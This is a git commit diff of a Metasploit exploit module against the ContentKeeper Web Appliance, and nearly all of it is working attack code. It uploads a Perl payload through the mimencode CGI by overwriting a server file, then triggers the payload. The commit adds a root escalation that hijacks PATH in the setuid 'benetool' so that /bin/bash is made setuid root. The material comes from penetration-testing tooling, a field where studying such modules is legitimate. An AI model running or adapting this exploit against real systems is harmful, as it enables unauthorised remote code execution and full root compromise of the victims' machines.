Added privilege escalation to contentkeeperweb_mimencode exploit module.

git-svn-id: file:///home/svn/framework3/trunk@12265 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Patrick Webster 2011-04-07 11:02:48 +00:00
parent b90d6fc16f
commit cacac970e1
1 changed files with 32 additions and 14 deletions

View File

@ -22,9 +22,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Description' => %q{
This module exploits the ContentKeeper Web Appliance. Versions prior
to 125.10 are affected. This module exploits a combination of weaknesses
to enable remote command execution as the Apache user. Following exploitation
it is possible to abuse an insecure PATH call to 'ps' etc in setuid 'benetool'
to escalate to root.
to enable remote command execution as the Apache user. By setting
SkipEscalation to false, this module will attempt to setuid the bash shell.
},
'Author' => [ 'patrick' ],
'Arch' => [ ARCH_CMD ],
@ -32,8 +31,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '54551'],
[ 'OSVDB', '54552'],
[ 'OSVDB', '54551' ],
[ 'OSVDB', '54552' ],
[ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],
],
'Privileged' => false,
@ -44,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby telnet',
'RequiredCmd' => 'generic perl telnet',
}
},
'Platform' => ['unix'],
@ -58,6 +57,8 @@ class Metasploit3 < Msf::Exploit::Remote
register_options(
[
Opt::RPORT(80),
OptString.new('OVERWRITE', [ true, "The target file to upload our payload (spamkeeper.dat, bak.txt, formdate.pl etc)", 'spamkeeper.dat']),
OptBool.new("SkipEscalation", [true, "Specify this to skip the root escalation attempt", false]),
],self.class)
end
@ -77,31 +78,48 @@ class Metasploit3 < Msf::Exploit::Remote
exp = "#!/usr/bin/perl\n"
exp << "print \"Content-type: text/html\\n\\n\"\;\n\n"
exp << "use IO::Socket::INET;\n"
if (datastore['PAYLOAD'] =~ /perl/)
if not datastore['SkipEscalation']
print_status("Attempting to facilitate root escalation...")
exp << %q{ system("echo /bin/chmod u+s /bin/bash > ps; /bin/chmod o+x ps; PATH=.:$PATH; ./benetool stopall;"); } # We can use either 'ps' or 'grep' but ps is fine.
end
exp << payload.encoded.gsub('perl -MIO -e ', '').gsub('\'', '') # We're already inside a perl script!
else
exp << "system(\""
exp << payload.encoded.gsub('"', '\"')
exp << "\");\n"
end
body = Rex::Text.encode_base64(exp)
connect
sploit = "POST /cgi-bin/ck/mimencode?-u+-o+bak.txt HTTP/1.1\r\n"
sploit = "POST /cgi-bin/ck/mimencode?-u+-o+#{datastore['OVERWRITE']} HTTP/1.1\r\n"
sploit << "Host: #{datastore['RHOST']}\r\n"
sploit << "Content-Length: #{body.length}\r\n\r\n"
print_status("Uploading payload to target.")
print_status("Uploading payload to target...")
sock.put(sploit + body + "\r\n\r\n")
disconnect
select(nil,nil,nil,5)
select(nil,nil,nil,3) # Wait a few seconds..
print_status("Calling payload...")
connect
req = "GET /cgi-bin/ck/bak.txt HTTP/1.1\r\n" # bak.txt is owned by apache, chmod 777 :) rwx
req = "GET /cgi-bin/ck/#{datastore['OVERWRITE']} HTTP/1.1\r\n" # Almost all files are owned by root, chmod'ed 777 :) rwx
req << "Host: #{datastore['RHOST']}\r\n"
sock.put(req + "\r\n\r\n")
handler
disconnect
select(nil,nil,nil,3) # Wait for session creation.
if not datastore['SkipEscalation'] and session_created? and datastore['PAYLOAD'] =~ /perl/
print_status("Privilege escalation appears to have worked!")
print_status("/bin/bash is now root setuid! Type 'bash -p' to get root.")
print_status("Don't forget to clean up afterwards (chmod -s /bin/bash and restore an original copy of the OVERWRITE file).")
end
end
end